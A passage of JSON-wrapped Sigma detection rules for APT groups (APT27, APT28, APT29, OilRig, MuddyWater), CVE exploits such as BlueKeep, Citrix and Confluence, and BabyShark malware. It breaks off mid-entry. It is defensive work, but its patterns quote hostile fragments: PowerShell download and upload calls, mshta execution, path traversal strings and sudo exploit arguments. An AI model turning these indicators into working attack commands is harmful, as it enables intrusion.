    "content": "title: APT27 - Emissary Panda Activity\nid: 9aa01d62-7667-4d3b-acb8-8cb5103e2014\nstatus: test\ndescription: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27\nreferences:\n    - https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965\n    - https://twitter.com/cyb3rops/status/1168863899531132929\n    - https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-09-03\nmodified: 2023-03-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\n    - attack.g0027\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sllauncher:\n        ParentImage|endswith: '\\sllauncher.exe'\n        Image|endswith: '\\svchost.exe'\n    selection_svchost:\n        ParentImage|contains: '\\AppData\\Roaming\\'\n        Image|endswith: '\\svchost.exe'\n        CommandLine|contains: '-k'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml",
    "content": "title: Sofacy Trojan Loader Activity\nid: ba778144-5e3d-40cf-8af9-e28fb1df1e20\nstatus: test\ndescription: Detects Trojan loader activity as used by APT28\nreferences:\n    - https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/\n    - https://www.hybrid-analysis.com/sample/ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8?environmentId=110\n    - https://twitter.com/ClearskySec/status/960924755355369472\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community\ndate: 2018-03-01\nmodified: 2023-05-31\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.g0007\n    - attack.t1059.003\n    - attack.t1218.011\n    - car.2013-10-002\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_path:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            - '%LOCALAPPDATA%'\n            - '\\AppData\\Local\\'\n    selection_extensions:\n        - CommandLine|contains: '.dat\",'\n        - CommandLine|endswith:\n              - '.dll #1'\n              - '.dll\" #1'\n              - '.dll\",#1'\n    filter_main_exclude_temp:\n        CommandLine|contains: '\\AppData\\Local\\Temp\\'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/APT29-CozyBear/file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml",
    "content": "title: APT29 2018 Phishing Campaign File Indicators\nid: 3a3f81ca-652c-482b-adeb-b1c804727f74\nrelated:\n    - id: 7453575c-a747-40b9-839b-125a0aae324b # ProcessCreation\n      type: derived\nstatus: stable\ndescription: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant\nreferences:\n    - https://twitter.com/DrunkBinary/status/1063075530180886529\n    - https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign\nauthor: '@41thexplorer'\ndate: 2018-11-20\nmodified: 2023-02-20\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains:\n            - 'ds7002.lnk'\n            - 'ds7002.pdf'\n            - 'ds7002.zip'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml",
    "content": "title: APT29 2018 Phishing Campaign CommandLine Indicators\nid: 7453575c-a747-40b9-839b-125a0aae324b\nrelated:\n    - id: 033fe7d6-66d1-4240-ac6b-28908009c71f\n      type: obsolete\nstatus: stable\ndescription: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant\nreferences:\n    - https://twitter.com/DrunkBinary/status/1063075530180886529\n    - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/\n    - https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign\nauthor: Florian Roth (Nextron Systems), @41thexplorer\ndate: 2018-11-20\nmodified: 2023-03-08\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains: '-noni -ep bypass $'\n        - CommandLine|contains|all:\n              - 'cyzfc.dat,'\n              - 'PointFunctionCall'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/APT32-Oceanlotus/registry_event_apt_oceanlotus_registry.yml",
    "content": "title: OceanLotus Registry Activity\nid: 4ac5fc44-a601-4c06-955b-309df8c4e9d4\nstatus: test\ndescription: Detects registry keys created in OceanLotus (also known as APT32) attacks\nreferences:\n    - https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/\n    - https://github.com/eset/malware-ioc/tree/master/oceanlotus\nauthor: megan201296, Jonhnathan Ribeiro\ndate: 2019-04-14\nmodified: 2023-09-28\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\n    - detection.emerging-threats\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection_clsid:\n        TargetObject|contains: '\\SOFTWARE\\Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model'\n    selection_hkcu:\n        TargetObject|contains:\n            # HKCU\\SOFTWARE\\Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\n            - 'Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\'\n            # HKCU\\SOFTWARE\\Classes\\AppX3bbba44c6cae4d9695755183472171e2\\\n            - 'Classes\\AppX3bbba44c6cae4d9695755183472171e2\\'\n            # HKCU\\SOFTWARE\\Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\n            - 'Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\'\n            - 'Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model'\n    selection_appx_1:\n        TargetObject|contains: '\\SOFTWARE\\App\\'\n    selection_appx_2:\n        TargetObject|contains:\n            - 'AppXbf13d4ea2945444d8b13e2121cb6b663\\'\n            - 'AppX70162486c7554f7f80f481985d67586d\\'\n            - 'AppX37cc7fdccd644b4f85f4b22d5a3f105a\\'\n        TargetObject|endswith:\n            - 'Application'\n            - 'DefaultIcon'\n    condition: selection_clsid or selection_hkcu or all of selection_appx_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml",
    "content": "title: Potential MuddyWater APT Activity\nid: 36222790-0d43-4fe8-86e4-674b27809543\nstatus: test\ndescription: Detects potential Muddywater APT activity\nreferences:\n    - https://www.mandiant.com/resources/blog/iranian-threat-group-updates-ttps-in-spear-phishing-campaign\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-10\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.g0069\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_mshta:\n        CommandLine|contains|all:\n            - 'vbscript:Close(Execute(\"CreateObject('\n            - 'powershell'\n            - '-w 1 -exec Bypass'\n            - '\\ProgramData\\'\n    selection_survey:\n        CommandLine|contains|all:\n            - 'Win32_OperatingSystem'\n            - 'Win32_NetworkAdapterConfiguration'\n            - 'root\\SecurityCenter2'\n            - '[System.Net.DNS]'\n    selection_pwsh_backdoor:\n        CommandLine|contains|all:\n            - '[Convert]::ToBase64String'\n            - '[System.Text.Encoding]::UTF8.GetString]'\n            - 'GetResponse().GetResponseStream()'\n            - '[System.Net.HttpWebRequest]::Create('\n            - '-bxor '\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml",
    "content": "title: OilRig APT Activity\nid: ce6e34ca-966d-41c9-8d93-5b06c8b97a06\nrelated:\n    - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System\n      type: similar\n    - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security\n      type: similar\n    - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry\n      type: similar\nstatus: test\ndescription: Detects OilRig activity as reported by Nyotron in their March 2018 report\nreferences:\n    - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf\nauthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community\ndate: 2018-03-23\nmodified: 2023-03-08\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.g0049\n    - attack.t1053.005\n    - attack.s0111\n    - attack.t1543.003\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.command-and-control\n    - attack.t1071.004\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_schtasks:\n        CommandLine|contains|all:\n            - 'SC Scheduled Scan'\n            - '\\microsoft\\Taskbar\\autoit3.exe'\n    selection_temp:\n        Image|contains: '\\Windows\\Temp\\DB\\'\n        Image|endswith: '.exe'\n    selection_service:\n        Image: 'C:\\Windows\\system32\\Service.exe'\n        CommandLine|contains:\n            - 'i'\n            - 'u'\n    selection_autoit:\n        ParentImage|endswith: '\\local\\microsoft\\Taskbar\\autoit3.exe'\n        CommandLine|contains|all:\n            - 'nslookup.exe'\n            - '-q=TXT'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/OilRig/registry_event_apt_oilrig_mar18.yml",
    "content": "title: OilRig APT Registry Persistence\nid: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5\nrelated:\n    - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System\n      type: similar\n    - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security\n      type: similar\n    - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation\n      type: similar\nstatus: test\ndescription: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report\nreferences:\n    - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf\nauthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community\ndate: 2018-03-23\nmodified: 2023-03-08\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.g0049\n    - attack.t1053.005\n    - attack.s0111\n    - attack.t1543.003\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.command-and-control\n    - attack.t1071.004\n    - detection.emerging-threats\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml",
    "content": "title: OilRig APT Schedule Task Persistence - Security\nid: c0580559-a6bd-4ef6-b9b7-83703d98b561\nrelated:\n    - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System\n      type: similar\n    - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry\n      type: similar\n    - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation\n      type: similar\nstatus: test\ndescription: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report\nreferences:\n    - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf\nauthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community\ndate: 2018-03-23\nmodified: 2023-03-08\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.g0049\n    - attack.t1053.005\n    - attack.s0111\n    - attack.t1543.003\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.command-and-control\n    - attack.t1071.004\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_service:\n        EventID: 4698\n        TaskName:\n            - 'SC Scheduled Scan'\n            - 'UpdatMachine'\n    condition: selection_service\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml",
    "content": "title: OilRig APT Schedule Task Persistence - System\nid: 53ba33fd-3a50-4468-a5ef-c583635cfa92\nrelated:\n    - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security\n      type: similar\n    - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry\n      type: similar\n    - id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation\n      type: similar\nstatus: test\ndescription: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report\nreferences:\n    - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf\nauthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community\ndate: 2018-03-23\nmodified: 2023-03-08\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.g0049\n    - attack.t1053.005\n    - attack.s0111\n    - attack.t1543.003\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.command-and-control\n    - attack.t1071.004\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName:\n            - 'SC Scheduled Scan'\n            - 'UpdatMachine'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml",
    "content": "title: Defrag Deactivation\nid: 958d81aa-8566-4cea-a565-59ccd4df27b0\nstatus: test\ndescription: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group\nreferences:\n    - https://securelist.com/apt-slingshot/84312/\nauthor: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)\ndate: 2019-03-04\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.s0111\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains:\n            - '/delete'\n            - '/change'\n        CommandLine|contains|all:\n            - '/TN'\n            - '\\Microsoft\\Windows\\Defrag\\ScheduledDefrag'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml",
    "content": "title: Defrag Deactivation - Security\nid: c5a178bf-9cfb-4340-b584-e4df39b6a3e7\nrelated:\n    - id: 958d81aa-8566-4cea-a565-59ccd4df27b0\n      type: derived\nstatus: test\ndescription: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group\nreferences:\n    - https://securelist.com/apt-slingshot/84312/\nauthor: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)\ndate: 2019-03-04\nmodified: 2022-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053\n    - attack.s0111\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Audit Other Object Access Events > Success'\ndetection:\n    selection:\n        EventID: 4701\n        TaskName: '\\Microsoft\\Windows\\Defrag\\ScheduledDefrag'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml",
    "content": "title: TropicTrooper Campaign November 2018\nid: 8c7090c3-e0a0-4944-bd08-08c3a0cecf79\nstatus: stable\ndescription: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/\nauthor: '@41thexplorer, Microsoft Defender ATP'\ndate: 2019-11-12\nmodified: 2020-08-27\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc'\n    condition: selection\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml",
    "content": "title: Potential BearLPE Exploitation\nid: 931b6802-d6a6-4267-9ffa-526f57f22aaf\nstatus: test\ndescription: Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par\nreferences:\n    - https://github.com/djhohnstein/polarbearrepo/blob/f26d3e008093cc5c835e92a7165170baf6713d43/bearlpe/polarbear/polarbear/exploit.cpp\nauthor: Olaf Hartong\ndate: 2019-05-22\nmodified: 2023-01-26\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1053.005\n    - car.2013-08-001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/change'\n            - '/TN'\n            - '/RU'\n            - '/RP'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-0708/win_security_exploit_cve_2019_0708_scanner_poc.yml",
    "content": "title: Scanner PoC for CVE-2019-0708 RDP RCE Vuln\nid: 8400629e-79a9-4737-b387-5db940ab2367\nstatus: test\ndescription: Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to  CVE-2019-0708 RDP RCE aka BlueKeep\nreferences:\n    - https://twitter.com/AdamTheAnalyst/status/1134394070045003776\n    - https://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708\nauthor: Florian Roth (Nextron Systems), Adam Bradbury (idea)\ndate: 2019-06-02\nmodified: 2022-12-25\ntags:\n    - attack.lateral-movement\n    - attack.t1210\n    - car.2013-07-002\n    - detection.emerging-threats\n    - cve.2019-0708\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4625\n        TargetUserName: AAAAAAA\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-0708/win_system_exploit_cve_2019_0708.yml",
    "content": "title: Potential RDP Exploit CVE-2019-0708\nid: aaa5b30d-f418-420b-83a0-299cb6024885\nstatus: test\ndescription: Detect suspicious error on protocol RDP, potential CVE-2019-0708\nreferences:\n    - https://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708\n    - https://github.com/Ekultek/BlueKeep\nauthor: 'Lionel PRAT, Christophe BROCAS, @atc_project (improvements)'\ndate: 2019-05-24\nmodified: 2022-12-25\ntags:\n    - attack.lateral-movement\n    - attack.t1210\n    - car.2013-07-002\n    - cve.2019-0708\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID:\n            - 56\n            - 50\n        Provider_Name: TermDD\n    condition: selection\nfalsepositives:\n    - Bad connections or network interruptions\n# too many false positives\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-11510/web_cve_2019_11510_pulsesecure_exploit.yml",
    "content": "title: Pulse Secure Attack CVE-2019-11510\nid: 2dbc10d7-a797-49a8-8776-49efa6442e60\nstatus: test\ndescription: Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole\nreferences:\n    - https://www.exploit-db.com/exploits/47297\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-11-18\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2019-11510\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query: '*?/dana/html5acc/guacamole/*'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-1378/proc_creation_win_exploit_cve_2019_1378.yml",
    "content": "title: Exploiting SetupComplete.cmd CVE-2019-1378\nid: 1c373b6d-76ce-4553-997d-8c1da9a6b5f5\nstatus: test\ndescription: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378\nreferences:\n    - https://web.archive.org/web/20200530031708/https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua\nauthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro\ndate: 2019-11-15\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1068\n    - attack.execution\n    - attack.t1059.003\n    - attack.t1574\n    - cve.2019-1378\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentCommandLine|contains|all:\n            - '\\cmd.exe'\n            - '/c'\n            - 'C:\\Windows\\Setup\\Scripts\\'\n        ParentCommandLine|endswith:\n            - 'SetupComplete.cmd'\n            - 'PartnerSetupComplete.cmd'\n    filter:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n            - 'C:\\Windows\\Setup\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml",
    "content": "title: Exploiting CVE-2019-1388\nid: 02e0b2ea-a597-428e-b04a-af6a1a403e5c\nstatus: stable\ndescription: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM\nreferences:\n    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388\n    - https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-11-20\nmodified: 2024-12-01\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - cve.2019-1388\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        ParentImage|endswith: '\\consent.exe'\n        Image|endswith: '\\iexplore.exe'\n        CommandLine|contains: ' http'\n    selection_rights:\n        - IntegrityLevel:\n              - 'System'  # for Sysmon users\n              - 'S-1-16-16384' # System\n        - User|contains: # covers many language settings\n              - 'AUTHORI'\n              - 'AUTORI'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-14287/lnx_sudo_exploit_cve_2019_14287.yml",
    "content": "title: Sudo Privilege Escalation CVE-2019-14287 - Builtin\nid: 7fcc54cb-f27d-4684-84b7-436af096f858\nrelated:\n    - id: f74107df-b6c6-4e80-bf00-4170b658162b\n      type: derived\nstatus: test\ndescription: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287\nreferences:\n    - https://www.openwall.com/lists/oss-security/2019/10/14/1\n    - https://access.redhat.com/security/cve/cve-2019-14287\n    - https://twitter.com/matthieugarin/status/1183970598210412546\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-15\nmodified: 2022-11-26\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1068\n    - attack.t1548.003\n    - cve.2019-14287\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    service: sudo\ndetection:\n    selection_user:\n        USER:\n            - '#-*'\n            - '#*4294967295'\n    condition: selection_user\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-14287/proc_creation_lnx_exploit_cve_2019_14287.yml",
    "content": "title: Sudo Privilege Escalation CVE-2019-14287\nid: f74107df-b6c6-4e80-bf00-4170b658162b\nstatus: test\ndescription: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287\nreferences:\n    - https://www.openwall.com/lists/oss-security/2019/10/14/1\n    - https://access.redhat.com/security/cve/cve-2019-14287\n    - https://twitter.com/matthieugarin/status/1183970598210412546\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-15\nmodified: 2022-10-05\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1068\n    - attack.t1548.003\n    - cve.2019-14287\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains: ' -u#'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-19781/web_cve_2019_19781_citrix_exploit.yml",
    "content": "title: Citrix Netscaler Attack CVE-2019-19781\nid: ac5a6409-8c89-44c2-8d64-668c29a2d756\nstatus: test\ndescription: Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack\nreferences:\n    - https://support.citrix.com/article/CTX267679\n    - https://support.citrix.com/article/CTX267027\n    - https://isc.sans.edu/diary/25686\n    - https://twitter.com/mpgn_x64/status/1216787131210829826\n    - https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md\nauthor: Arnim Rupp, Florian Roth\ndate: 2020-01-02\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2019-19781\n    - detection.emerging-threats\nlogsource:\n    category: webserver\n    definition: 'Make sure that your Netscaler appliance logs all kinds of attacks (test with http://your-citrix-gw.net/robots.txt). The directory traversal with ../ might not be needed on certain cloud instances or for authenticated users, so we also check for direct paths. All scripts in portal/scripts are exploitable except logout.pl.'\ndetection:\n    selection_cs:\n        - cs-uri-query|contains: '/../vpns/'\n        - cs-uri-query|endswith: '/vpns/cfg/smb.conf'\n    selection_csall:\n        cs-uri-query|contains|all:\n            - '/vpns/portal/scripts/'\n            - '.pl'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Exploits/CVE-2019-3398/web_cve_2019_3398_confluence.yml",
    "content": "title: Confluence Exploitation CVE-2019-3398\nid: e9bc39ae-978a-4e49-91ab-5bd481fc668b\nstatus: test\ndescription: Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398\nreferences:\n    - https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-05-26\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2019-3398\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query|contains|all:\n            - '/upload.action'\n            - 'filename=../../../../'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml",
    "content": "title: Potential Baby Shark Malware Activity\nid: 2b30fa36-3a18-402f-a22d-bf4ce2189f35\nstatus: test\ndescription: Detects activity that could be related to Baby Shark malware\nreferences:\n    - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-02-24\nmodified: 2023-03-08\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.discovery\n    - attack.t1012\n    - attack.t1059.003\n    - attack.t1059.001\n    - attack.t1218.005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains|all:\n              - 'powershell.exe mshta.exe http'\n              - '.hta'\n        - CommandLine|contains:\n              - 'reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"'\n              - 'cmd.exe /c taskkill /im cmd.exe'\n              - \"(New-Object System.Net.WebClient).UploadFile('http\"\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Chafer/proxy_malware_chafer_url_pattern.yml",
